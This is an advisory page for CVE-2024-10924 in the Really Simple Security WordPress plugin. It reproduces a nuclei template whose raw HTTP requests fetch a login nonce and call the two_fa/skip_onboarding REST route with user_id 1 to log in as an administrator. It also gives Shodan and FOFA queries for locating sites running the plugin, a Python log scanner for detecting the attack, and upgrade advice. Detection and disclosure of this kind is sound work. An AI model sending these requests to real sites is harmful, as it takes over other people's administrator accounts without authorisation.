Really Simple Security < 9.1.2 - Authentication Bypass

🗓️ 19 Nov 2024 01:51:44 · Reported by ProjectDiscovery · Type: nuclei · 🔗 github.com

Really Simple Security < 9.1.2 - Authentication Bypass in WordPress

id: CVE-2024-10924

info:
  name: Really Simple Security < 9.1.2 - Authentication Bypass
  author: yaser_s
  severity: critical
  description: |
    The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
  remediation: Fixed in 9.1.2
  reference:
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
    - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
    - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10924
    cwe-id: CWE-288,CWE-306
    epss-score: 0.00101
    epss-percentile: 0.4287
    cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: really-simple-plugins
    product: really_simple_security
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/really-simple-ssl"
    fofa-query: body="/wp-content/plugins/really-simple-ssl"
  tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"\}'
        internal: true

  - raw:
      - |
        POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "user_id": 1,
            "login_nonce": "{{nonce}}",
            "redirect_to": "/wp-admin/"
        }

    matchers:
      - type: word
        part: body
        words:
          - '"redirect_to":"\/wp-admin\/"'
        internal: true

  - raw:
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Personal Options'

      - type: word
        part: content_type
        words:
          - 'text/html'
# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950
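
For defenders, the second request in the template gives a concrete log signature: a POST to the reallysimplessl/v1/two_fa/skip_onboarding REST route. The Python script below is an added example, not part of the ProjectDiscovery template or the plugin; it assumes Combined Log Format access logs, and the function names, sample lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# REST route taken from the template's second request.
ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Nov/2024:02:10:01 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [19/Nov/2024:02:10:02 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.4 - - [19/Nov/2024:02:11:40 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 404 98 "-" "-"',
    '192.0.2.15 - - [19/Nov/2024:02:12:00 +0000] "POST /index.php?rest_route=%2Freallysimplessl%2Fv1%2Ftwo_fa%2Fskip_onboarding HTTP/1.1" 200 310 "-" "-"',
    '192.0.2.30 - - [19/Nov/2024:02:13:00 +0000] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 2048 "-" "-"',
]


def rest_route(target):
    """Return the WordPress REST route a request target addresses, or None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if "/wp-json/" in path:  # pretty-permalink form of the REST API
        return "/" + path.split("/wp-json/", 1)[1]
    # Plain form used by the template: ?rest_route=/... (parse_qs percent-decodes)
    routes = parse_qs(parts.query).get("rest_route")
    return routes[-1] if routes else None


def find_hits(lines):
    """Return (ip, timestamp, status) for each POST to the skip_onboarding route."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        route = rest_route(m["target"])
        # Compare case-insensitively and ignore a trailing slash so trivial
        # variations of the same route are not missed.
        if route and route.rstrip("/").lower() == ROUTE:
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, status in find_hits(SAMPLE_LOG):
        print(f"{ts} {ip} POST {ROUTE} -> {status}")
```

On a site running 9.0.0 to 9.1.1.1 with two-factor authentication enabled, treat each hit as a lead for triage: review the same client's later /wp-admin/ requests and upgrade to 9.1.2.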

19 Nov 2024 01:44 (current)
Vulners AI Score: 6.9 (Medium risk)
CVSS3: 9.8
EPSS: 0.23